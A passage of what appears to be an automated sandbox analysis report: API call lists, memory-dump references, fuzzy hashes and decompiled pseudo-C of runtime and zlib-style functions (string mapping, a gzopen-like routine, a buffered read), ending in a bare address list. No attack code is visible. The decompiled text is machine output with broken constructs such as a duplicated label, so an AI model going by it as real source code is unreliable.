                                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417111
                                                                                                              • _malloc.LIBCMT ref: 0041714A
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 0041717D
                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 00417199
                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 004171D3
                                                                                                              • _malloc.LIBCMT ref: 0041720C
                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417237
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041725A
                                                                                                              • __freea.LIBCMT ref: 00417264
                                                                                                              • __freea.LIBCMT ref: 0041726D
                                                                                                              • ___ansicp.LIBCMT ref: 0041729E
                                                                                                              • ___convertcp.LIBCMT ref: 004172C9
                                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 004172EA
                                                                                                              • _malloc.LIBCMT ref: 00417322
                                                                                                              • _memset.LIBCMT ref: 00417344
                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041735C
                                                                                                              • ___convertcp.LIBCMT ref: 0041737A
                                                                                                              • __freea.LIBCMT ref: 0041738F
                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3809854901-0
                                                                                                              • Opcode ID: 69f09b59e09a0bd2d6d81dae250e0d8151cfd5ec05e1e85cbf6b7e3de0be678f
                                                                                                              • Instruction ID: abda70701d45e68d96e2917a94aa4f5dbb1b5ba954cdfcd5a2fe0a3214fe1872
                                                                                                              • Opcode Fuzzy Hash: 69f09b59e09a0bd2d6d81dae250e0d8151cfd5ec05e1e85cbf6b7e3de0be678f
                                                                                                              • Instruction Fuzzy Hash: DCB1A072908119EFDF119FA5CC808EF3BB5EB48354B14856BFD15A2260D3398DD2DBA8
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 83%
                                                                                                              			E00405760(intOrPtr* __eax) {
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				intOrPtr* _t57;
                                                                                                              				char* _t60;
                                                                                                              				char _t62;
                                                                                                              				intOrPtr _t63;
                                                                                                              				char _t64;
                                                                                                              				intOrPtr _t65;
                                                                                                              				intOrPtr _t66;
                                                                                                              				intOrPtr _t67;
                                                                                                              				intOrPtr _t69;
                                                                                                              				intOrPtr _t70;
                                                                                                              				intOrPtr _t74;
                                                                                                              				intOrPtr _t79;
                                                                                                              				intOrPtr _t82;
                                                                                                              				intOrPtr* _t83;
                                                                                                              				void* _t86;
                                                                                                              				char* _t88;
                                                                                                              				char* _t89;
                                                                                                              				intOrPtr* _t91;
                                                                                                              				intOrPtr* _t93;
                                                                                                              				signed int _t97;
                                                                                                              				signed int _t98;
                                                                                                              				void* _t100;
                                                                                                              				void* _t101;
                                                                                                              				void* _t102;
                                                                                                              				void* _t103;
                                                                                                              				void* _t104;
                                                                                                              
                                                                                                              				_t98 = _t97 | 0xffffffff;
                                                                                                              				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                              				_t91 = __eax;
                                                                                                              				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                              				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                              					__eflags = 0;
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t93 = E0040B80D(0, _t86, __eax, 0x74);
                                                                                                              					_t101 = _t100 + 4;
                                                                                                              					if(_t93 == 0) {
                                                                                                              						L31:
                                                                                                              						return 0;
                                                                                                              					} else {
                                                                                                              						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                              						 *_t93 = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                              						 *(_t93 + 0x6c) = _t98;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x4c)) = E00403030(0, 0, 0);
                                                                                                              						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                              						_t102 = _t101 + 0xc;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                              						_t87 = _t57 + 1;
                                                                                                              						do {
                                                                                                              							_t82 =  *_t57;
                                                                                                              							_t57 = _t57 + 1;
                                                                                                              						} while (_t82 != 0);
                                                                                                              						_t60 = E0040B80D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                              						_t103 = _t102 + 4;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                              						if(_t60 == 0) {
                                                                                                              							L30:
                                                                                                              							E00405110(0, _t87, _t93);
                                                                                                              							goto L31;
                                                                                                              						} else {
                                                                                                              							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                              							_t88 = _t60;
                                                                                                              							goto L7;
                                                                                                              							L9:
                                                                                                              							L9:
                                                                                                              							if( *_t91 == 0x72) {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                              							}
                                                                                                              							_t63 =  *_t91;
                                                                                                              							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                              							}
                                                                                                              							_t64 =  *_t91;
                                                                                                              							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                              								__eflags = _t64 - 0x66;
                                                                                                              								if(_t64 != 0x66) {
                                                                                                              									__eflags = _t64 - 0x68;
                                                                                                              									if(_t64 != 0x68) {
                                                                                                              										__eflags = _t64 - 0x52;
                                                                                                              										if(_t64 != 0x52) {
                                                                                                              											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                              											 *_t89 = _t64;
                                                                                                              											_t87 = _t89 + 1;
                                                                                                              											__eflags = _t87;
                                                                                                              											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                              										} else {
                                                                                                              											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                              									}
                                                                                                              								} else {
                                                                                                              									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                              								}
                                                                                                              							} else {
                                                                                                              								_t98 = _t64 - 0x30;
                                                                                                              							}
                                                                                                              							_t91 = _t91 + 1;
                                                                                                              							if(_t64 == 0) {
                                                                                                              								goto L26;
                                                                                                              							}
                                                                                                              							_t87 = _t103 + 0x68;
                                                                                                              							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                              								goto L9;
                                                                                                              							}
                                                                                                              							L26:
                                                                                                              							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                              							if(_t65 == 0) {
                                                                                                              								goto L30;
                                                                                                              							} else {
                                                                                                              								if(_t65 != 0x77) {
                                                                                                              									_t66 = E0040B80D(0, _t87, _t91, 0x4000);
                                                                                                              									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                              									 *_t93 = _t66;
                                                                                                              									_t67 = E00407150(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                              									_t104 = _t103 + 0x14;
                                                                                                              									__eflags = _t67;
                                                                                                              									if(_t67 != 0) {
                                                                                                              										goto L30;
                                                                                                              									} else {
                                                                                                              										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                              										if(__eflags == 0) {
                                                                                                              											goto L30;
                                                                                                              										} else {
                                                                                                              											goto L34;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								} else {
                                                                                                              									_push(0x38);
                                                                                                              									_push("1.2.3");
                                                                                                              									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                              									_push(8);
                                                                                                              									_push(0xfffffff1);
                                                                                                              									_push(8);
                                                                                                              									_push(_t98);
                                                                                                              									_push(_t93);
                                                                                                              									_t91 = E00404C90();
                                                                                                              									_t79 = E0040B80D(0, _t87, _t91, 0x4000);
                                                                                                              									_t104 = _t103 + 0x24;
                                                                                                              									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                              									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                              									if(_t91 != 0 || _t79 == 0) {
                                                                                                              										goto L30;
                                                                                                              									} else {
                                                                                                              										L34:
                                                                                                              										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                              										 *((intOrPtr*)(E0040BF81(__eflags))) = 0;
                                                                                                              										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                              										__eflags = _t69;
                                                                                                              										_push(_t104 + 0x18);
                                                                                                              										if(__eflags >= 0) {
                                                                                                              											_push(_t69);
                                                                                                              											_t70 = E0040C913(0, _t87, _t91, _t93, __eflags);
                                                                                                              										} else {
                                                                                                              											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                              											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                              											_t70 = E0040CB5D();
                                                                                                              										}
                                                                                                              										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                              										__eflags = _t70;
                                                                                                              										if(_t70 == 0) {
                                                                                                              											goto L30;
                                                                                                              										} else {
                                                                                                              											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                              											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                              												E00404FB0(_t93, 0);
                                                                                                              												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                              												_t74 = E0040C8A5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                              												__eflags = _t74;
                                                                                                              												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                              												return _t93;
                                                                                                              											} else {
                                                                                                              												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                              												return _t93;
                                                                                                              											}
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              							goto L42;
                                                                                                              							L7:
                                                                                                              							_t62 =  *_t83;
                                                                                                              							 *_t88 = _t62;
                                                                                                              							_t83 = _t83 + 1;
                                                                                                              							_t88 = _t88 + 1;
                                                                                                              							if(_t62 != 0) {
                                                                                                              								goto L7;
                                                                                                              							} else {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                              							}
                                                                                                              							goto L9;
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L42:
                                                                                                              			}

































                                                                                                              0x00405767
                                                                                                              0x0040576f
                                                                                                              0x00405773
                                                                                                              0x00405775
                                                                                                              0x0040577d
                                                                                                              0x00405978
                                                                                                              0x0040597e
                                                                                                              0x0040578b
                                                                                                              0x00405793
                                                                                                              0x00405795
                                                                                                              0x0040579a
                                                                                                              0x004058d1
                                                                                                              0x004058da
                                                                                                              0x004057a0
                                                                                                              0x004057a3
                                                                                                              0x004057a6
                                                                                                              0x004057a9
                                                                                                              0x004057ac
                                                                                                              0x004057af
                                                                                                              0x004057b1
                                                                                                              0x004057b4
                                                                                                              0x004057b7
                                                                                                              0x004057ba
                                                                                                              0x004057bd
                                                                                                              0x004057c0
                                                                                                              0x004057c3
                                                                                                              0x004057c6
                                                                                                              0x004057c9
                                                                                                              0x004057cc
                                                                                                              0x004057d4
                                                                                                              0x004057d7
                                                                                                              0x004057db
                                                                                                              0x004057de
                                                                                                              0x004057e1
                                                                                                              0x004057e4
                                                                                                              0x004057e7
                                                                                                              0x004057e7
                                                                                                              0x004057e9
                                                                                                              0x004057ea
                                                                                                              0x004057f2
                                                                                                              0x004057f7
                                                                                                              0x004057fa
                                                                                                              0x004057ff
                                                                                                              0x004058cc
                                                                                                              0x004058cc
                                                                                                              0x00000000
                                                                                                              0x00405805
                                                                                                              0x00405805
                                                                                                              0x00405809
                                                                                                              0x0040580b
                                                                                                              0x00000000
                                                                                                              0x00405820
                                                                                                              0x00405822
                                                                                                              0x00405824
                                                                                                              0x00405824
                                                                                                              0x00405827
                                                                                                              0x0040582b
                                                                                                              0x00405831
                                                                                                              0x00405831
                                                                                                              0x00405835
                                                                                                              0x00405839
                                                                                                              0x00405847
                                                                                                              0x00405849
                                                                                                              0x00405855
                                                                                                              0x00405857
                                                                                                              0x00405863
                                                                                                              0x00405865
                                                                                                              0x00405871
                                                                                                              0x00405875
                                                                                                              0x00405877
                                                                                                              0x00405877
                                                                                                              0x00405878
                                                                                                              0x00405867
                                                                                                              0x00405867
                                                                                                              0x00405867
                                                                                                              0x00405859
                                                                                                              0x00405859
                                                                                                              0x00405859
                                                                                                              0x0040584b
                                                                                                              0x0040584b
                                                                                                              0x0040584b
                                                                                                              0x0040583f
                                                                                                              0x00405842
                                                                                                              0x00405842
                                                                                                              0x0040587c
                                                                                                              0x0040587f
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405881
                                                                                                              0x00405889
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040588b
                                                                                                              0x0040588b
                                                                                                              0x00405890
                                                                                                              0x00000000
                                                                                                              0x00405892
                                                                                                              0x00405894
                                                                                                              0x004058e0
                                                                                                              0x004058ef
                                                                                                              0x004058f2
                                                                                                              0x004058f4
                                                                                                              0x004058f9
                                                                                                              0x004058fc
                                                                                                              0x004058fe
                                                                                                              0x00000000
                                                                                                              0x00405900
                                                                                                              0x00405900
                                                                                                              0x00405903
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405903
                                                                                                              0x00405896
                                                                                                              0x0040589a
                                                                                                              0x0040589c
                                                                                                              0x004058a1
                                                                                                              0x004058a2
                                                                                                              0x004058a4
                                                                                                              0x004058a6
                                                                                                              0x004058a8
                                                                                                              0x004058a9
                                                                                                              0x004058b4
                                                                                                              0x004058b6
                                                                                                              0x004058bb
                                                                                                              0x004058be
                                                                                                              0x004058c1
                                                                                                              0x004058c6
                                                                                                              0x00000000
                                                                                                              0x00405905
                                                                                                              0x00405905
                                                                                                              0x00405905
                                                                                                              0x00405911
                                                                                                              0x00405913
                                                                                                              0x00405917
                                                                                                              0x0040591d
                                                                                                              0x0040591e
                                                                                                              0x0040592c
                                                                                                              0x0040592d
                                                                                                              0x00405920
                                                                                                              0x00405920
                                                                                                              0x00405924
                                                                                                              0x00405925
                                                                                                              0x00405925
                                                                                                              0x00405935
                                                                                                              0x00405938
                                                                                                              0x0040593a
                                                                                                              0x00000000
                                                                                                              0x0040593c
                                                                                                              0x0040593c
                                                                                                              0x00405940
                                                                                                              0x00405955
                                                                                                              0x0040595d
                                                                                                              0x00405966
                                                                                                              0x00405966
                                                                                                              0x00405969
                                                                                                              0x00405975
                                                                                                              0x00405942
                                                                                                              0x00405942
                                                                                                              0x00405952
                                                                                                              0x00405952
                                                                                                              0x00405940
                                                                                                              0x0040593a
                                                                                                              0x004058c6
                                                                                                              0x00405894
                                                                                                              0x00000000
                                                                                                              0x00405810
                                                                                                              0x00405810
                                                                                                              0x00405812
                                                                                                              0x00405814
                                                                                                              0x00405815
                                                                                                              0x00405818
                                                                                                              0x00000000
                                                                                                              0x0040581a
                                                                                                              0x0040581a
                                                                                                              0x0040581d
                                                                                                              0x00000000
                                                                                                              0x00405818
                                                                                                              0x004057ff
                                                                                                              0x0040579a
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0040578E
                                                                                                                • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                                • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                                • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                              • _malloc.LIBCMT ref: 004057F2
                                                                                                              • _malloc.LIBCMT ref: 004058B6
                                                                                                              • _malloc.LIBCMT ref: 004058E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                              • String ID: 1.2.3
                                                                                                              • API String ID: 680241177-2310465506
                                                                                                              • Opcode ID: cd0924cdb5ed944c5657c2e27923ccdb471edeb1bf7d7dc215a71cce5c5ea445
                                                                                                              • Instruction ID: d33edc5f4644e391b8b4222eb6447303ef68805c976fd54f75bf396b81ad9fa3
                                                                                                              • Opcode Fuzzy Hash: cd0924cdb5ed944c5657c2e27923ccdb471edeb1bf7d7dc215a71cce5c5ea445
                                                                                                              • Instruction Fuzzy Hash: 3461F8B2944B418FC720AF2A848065BBBE0FB45314F50893FE9D9A3780D739D8498F5A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 85%
                                                                                                              			E0040BC82(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                              				signed int _v8;
                                                                                                              				char* _v12;
                                                                                                              				signed int _v16;
                                                                                                              				signed int _v20;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t90;
                                                                                                              				intOrPtr* _t92;
                                                                                                              				signed int _t94;
                                                                                                              				char _t97;
                                                                                                              				signed int _t105;
                                                                                                              				void* _t106;
                                                                                                              				signed int _t107;
                                                                                                              				signed int _t110;
                                                                                                              				signed int _t113;
                                                                                                              				intOrPtr* _t114;
                                                                                                              				signed int _t118;
                                                                                                              				signed int _t119;
                                                                                                              				signed int _t120;
                                                                                                              				char* _t121;
                                                                                                              				signed int _t125;
                                                                                                              				signed int _t131;
                                                                                                              				signed int _t133;
                                                                                                              				void* _t134;
                                                                                                              
                                                                                                              				_t125 = __edx;
                                                                                                              				_t121 = _a4;
                                                                                                              				_t119 = _a8;
                                                                                                              				_t131 = 0;
                                                                                                              				_v12 = _t121;
                                                                                                              				_v8 = _t119;
                                                                                                              				if(_a12 == 0 || _a16 == 0) {
                                                                                                              					L5:
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t138 = _t121;
                                                                                                              					if(_t121 != 0) {
                                                                                                              						_t133 = _a20;
                                                                                                              						__eflags = _t133;
                                                                                                              						if(_t133 == 0) {
                                                                                                              							L9:
                                                                                                              							__eflags = _t119 - 0xffffffff;
                                                                                                              							if(_t119 != 0xffffffff) {
                                                                                                              								_t90 = E0040B9F0(_t131, _t121, _t131, _t119);
                                                                                                              								_t134 = _t134 + 0xc;
                                                                                                              							}
                                                                                                              							__eflags = _t133 - _t131;
                                                                                                              							if(__eflags == 0) {
                                                                                                              								goto L3;
                                                                                                              							} else {
                                                                                                              								_t94 = _t90 | 0xffffffff;
                                                                                                              								_t125 = _t94 % _a12;
                                                                                                              								__eflags = _a16 - _t94 / _a12;
                                                                                                              								if(__eflags > 0) {
                                                                                                              									goto L3;
                                                                                                              								}
                                                                                                              								L13:
                                                                                                              								_t131 = _a12 * _a16;
                                                                                                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                              								_v20 = _t131;
                                                                                                              								_t120 = _t131;
                                                                                                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                              									_v16 = 0x1000;
                                                                                                              								} else {
                                                                                                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                              								}
                                                                                                              								__eflags = _t131;
                                                                                                              								if(_t131 == 0) {
                                                                                                              									L40:
                                                                                                              									return _a16;
                                                                                                              								} else {
                                                                                                              									do {
                                                                                                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                              											L24:
                                                                                                              											__eflags = _t120 - _v16;
                                                                                                              											if(_t120 < _v16) {
                                                                                                              												_t97 = E0040FBC7(_t120, _t125, _t133);
                                                                                                              												__eflags = _t97 - 0xffffffff;
                                                                                                              												if(_t97 == 0xffffffff) {
                                                                                                              													L48:
                                                                                                              													return (_t131 - _t120) / _a12;
                                                                                                              												}
                                                                                                              												__eflags = _v8;
                                                                                                              												if(_v8 == 0) {
                                                                                                              													L44:
                                                                                                              													__eflags = _a8 - 0xffffffff;
                                                                                                              													if(__eflags != 0) {
                                                                                                              														E0040B9F0(_t131, _a4, 0, _a8);
                                                                                                              														_t134 = _t134 + 0xc;
                                                                                                              													}
                                                                                                              													 *((intOrPtr*)(E0040BF81(__eflags))) = 0x22;
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													L4:
                                                                                                              													E0040E704(_t125, _t131, _t133);
                                                                                                              													goto L5;
                                                                                                              												}
                                                                                                              												_t123 = _v12;
                                                                                                              												_v12 = _v12 + 1;
                                                                                                              												 *_v12 = _t97;
                                                                                                              												_t120 = _t120 - 1;
                                                                                                              												_t70 =  &_v8;
                                                                                                              												 *_t70 = _v8 - 1;
                                                                                                              												__eflags =  *_t70;
                                                                                                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                              												goto L39;
                                                                                                              											}
                                                                                                              											__eflags = _v16;
                                                                                                              											if(_v16 == 0) {
                                                                                                              												_t105 = 0x7fffffff;
                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                              													_t105 = _t120;
                                                                                                              												}
                                                                                                              											} else {
                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                              													_t55 = _t120 % _v16;
                                                                                                              													__eflags = _t55;
                                                                                                              													_t125 = _t55;
                                                                                                              													_t110 = _t120;
                                                                                                              												} else {
                                                                                                              													_t125 = 0x7fffffff % _v16;
                                                                                                              													_t110 = 0x7fffffff;
                                                                                                              												}
                                                                                                              												_t105 = _t110 - _t125;
                                                                                                              											}
                                                                                                              											__eflags = _t105 - _v8;
                                                                                                              											if(_t105 > _v8) {
                                                                                                              												goto L44;
                                                                                                              											} else {
                                                                                                              												_push(_t105);
                                                                                                              												_push(_v12);
                                                                                                              												_t106 = L0040F9E0(_t125, _t131, _t133);
                                                                                                              												_pop(_t123);
                                                                                                              												_push(_t106);
                                                                                                              												_t107 = E004102B4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                              												__eflags = _t107;
                                                                                                              												if(_t107 == 0) {
                                                                                                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                              													goto L48;
                                                                                                              												}
                                                                                                              												__eflags = _t107 - 0xffffffff;
                                                                                                              												if(_t107 == 0xffffffff) {
                                                                                                              													L47:
                                                                                                              													_t80 = _t133 + 0xc;
                                                                                                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                              													__eflags =  *_t80;
                                                                                                              													goto L48;
                                                                                                              												}
                                                                                                              												_v12 = _v12 + _t107;
                                                                                                              												_t120 = _t120 - _t107;
                                                                                                              												_v8 = _v8 - _t107;
                                                                                                              												goto L39;
                                                                                                              											}
                                                                                                              										}
                                                                                                              										_t113 =  *(_t133 + 4);
                                                                                                              										__eflags = _t113;
                                                                                                              										if(__eflags == 0) {
                                                                                                              											goto L24;
                                                                                                              										}
                                                                                                              										if(__eflags < 0) {
                                                                                                              											goto L47;
                                                                                                              										}
                                                                                                              										_t131 = _t120;
                                                                                                              										__eflags = _t120 - _t113;
                                                                                                              										if(_t120 >= _t113) {
                                                                                                              											_t131 = _t113;
                                                                                                              										}
                                                                                                              										__eflags = _t131 - _v8;
                                                                                                              										if(_t131 > _v8) {
                                                                                                              											_t133 = 0;
                                                                                                              											__eflags = _a8 - 0xffffffff;
                                                                                                              											if(__eflags != 0) {
                                                                                                              												E0040B9F0(_t131, _a4, 0, _a8);
                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                              											}
                                                                                                              											_t114 = E0040BF81(__eflags);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											 *_t114 = 0x22;
                                                                                                              											_push(_t133);
                                                                                                              											goto L4;
                                                                                                              										} else {
                                                                                                              											E004103B1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                              											 *_t133 =  *_t133 + _t131;
                                                                                                              											_v12 = _v12 + _t131;
                                                                                                              											_t120 = _t120 - _t131;
                                                                                                              											_t134 = _t134 + 0x10;
                                                                                                              											_v8 = _v8 - _t131;
                                                                                                              											_t131 = _v20;
                                                                                                              										}
                                                                                                              										L39:
                                                                                                              										__eflags = _t120;
                                                                                                              									} while (_t120 != 0);
                                                                                                              									goto L40;
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t118 = _t90 | 0xffffffff;
                                                                                                              						_t90 = _t118 / _a12;
                                                                                                              						_t125 = _t118 % _a12;
                                                                                                              						__eflags = _a16 - _t90;
                                                                                                              						if(_a16 <= _t90) {
                                                                                                              							goto L13;
                                                                                                              						}
                                                                                                              						goto L9;
                                                                                                              					}
                                                                                                              					L3:
                                                                                                              					_t92 = E0040BF81(_t138);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					 *_t92 = 0x16;
                                                                                                              					_push(_t131);
                                                                                                              					goto L4;
                                                                                                              				}
                                                                                                              			}





























                                                                                                              0x0040bc82
                                                                                                              0x0040bc8a
                                                                                                              0x0040bc8e
                                                                                                              0x0040bc93
                                                                                                              0x0040bc95
                                                                                                              0x0040bc98
                                                                                                              0x0040bc9e
                                                                                                              0x0040bcc1
                                                                                                              0x00000000
                                                                                                              0x0040bca5
                                                                                                              0x0040bca5
                                                                                                              0x0040bca7
                                                                                                              0x0040bcc8
                                                                                                              0x0040bccb
                                                                                                              0x0040bccd
                                                                                                              0x0040bcdc
                                                                                                              0x0040bcdc
                                                                                                              0x0040bcdf
                                                                                                              0x0040bce4
                                                                                                              0x0040bce9
                                                                                                              0x0040bce9
                                                                                                              0x0040bcec
                                                                                                              0x0040bcee
                                                                                                              0x00000000
                                                                                                              0x0040bcf0
                                                                                                              0x0040bcf0
                                                                                                              0x0040bcf5
                                                                                                              0x0040bcf8
                                                                                                              0x0040bcfb
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040bcfd
                                                                                                              0x0040bd00
                                                                                                              0x0040bd04
                                                                                                              0x0040bd0b
                                                                                                              0x0040bd0e
                                                                                                              0x0040bd10
                                                                                                              0x0040bd1a
                                                                                                              0x0040bd12
                                                                                                              0x0040bd15
                                                                                                              0x0040bd15
                                                                                                              0x0040bd21
                                                                                                              0x0040bd23
                                                                                                              0x0040be13
                                                                                                              0x00000000
                                                                                                              0x0040bd29
                                                                                                              0x0040bd29
                                                                                                              0x0040bd29
                                                                                                              0x0040bd30
                                                                                                              0x0040bd76
                                                                                                              0x0040bd76
                                                                                                              0x0040bd79
                                                                                                              0x0040bde4
                                                                                                              0x0040bdea
                                                                                                              0x0040bded
                                                                                                              0x0040be78
                                                                                                              0x00000000
                                                                                                              0x0040be7e
                                                                                                              0x0040bdf3
                                                                                                              0x0040bdf7
                                                                                                              0x0040be47
                                                                                                              0x0040be47
                                                                                                              0x0040be4b
                                                                                                              0x0040be55
                                                                                                              0x0040be5a
